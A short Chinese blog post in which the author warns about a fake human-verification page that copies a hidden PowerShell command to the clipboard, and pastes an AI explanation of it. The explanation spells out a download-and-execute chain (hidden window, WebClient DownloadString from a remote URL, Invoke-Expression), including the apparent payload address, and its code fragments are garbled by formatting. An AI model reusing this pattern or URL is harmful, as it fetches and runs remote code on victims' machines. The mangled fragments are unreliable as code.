突然想到一个问题,为什么现在电脑没有病毒了?
发布时间:
2024-11-18 17:59
阅读量:
4
今天进入某个网站弹出这样界面:
平凡无奇的人机验证对吧?
然后点一下就出现这样的内容——
??当我不知道这几步快捷键什么功能
要是有人比较呆不过脑子可能就直接照着按了
上一步点击 `verify` checkbox 的时候,网页复制一段powershell脚本(没错,只针对windows)。用gpt查了下,功能如下:
解释代码
GPT-4o mini
这段代码的功能是通过命令提示符执行一个 PowerShell 命令,从一个远程 URL 下载内容并执行。下面是对每个部分的详细解释:
cmd.exe /c: 这部分调用 Windows 的命令行工具cmd.exe
,/c
参数表示执行后关闭命令窗口。
powershell -WindowStyle Hidden: 这会启动 PowerShell,并将窗口设为隐藏,用户在执行时看不到任何 PowerShell 窗口。
-Command: 该参数后面的内容是要在 PowerShell 中执行的命令。
**"rQd=′https://s3−scw−tx.b−http://cdn.net/prizev2.txt′"∗∗:这行代码定义了一个变量‘rQd=′https://s3−scw−tx.b−cdn.net/prizev2.txt′"∗∗:这行代码定义了一个变量‘rQd`,其值为一个远程 URL,指向一个文本文件。
**pLs=New−ObjectSystem.Net.WebClient∗∗:这里创建了一个新的‘WebClient‘对象并赋值给变量‘pLs=New−ObjectSystem.Net.WebClient∗∗:这里创建了一个新的‘WebClient‘对象并赋值给变量‘pLs`,这个对象用于下载网络数据。
**sLf=sLf=pLs.DownloadString(rQd)∗∗:这行代码使用‘rQd)∗∗:这行代码使用‘pLs对象从 URL 下载数据,并将其结果存储在变量
$sLf` 中。
Invoke-Expression $sLf: 将下载的内容作为 PowerShell 命令执行。这意味着下载的文本将被视作可执行代码。
总结来说,这段代码是下载一个指定 URL 的文本文件,并在后台执行该文件中的 PowerShell 代码。这种技术常被用于执行远程脚本,但也存在安全风险,因为如果下载的内容是恶意的,会对系统造成威胁。
可以确信这是一个惊人的恶意网站。。。
END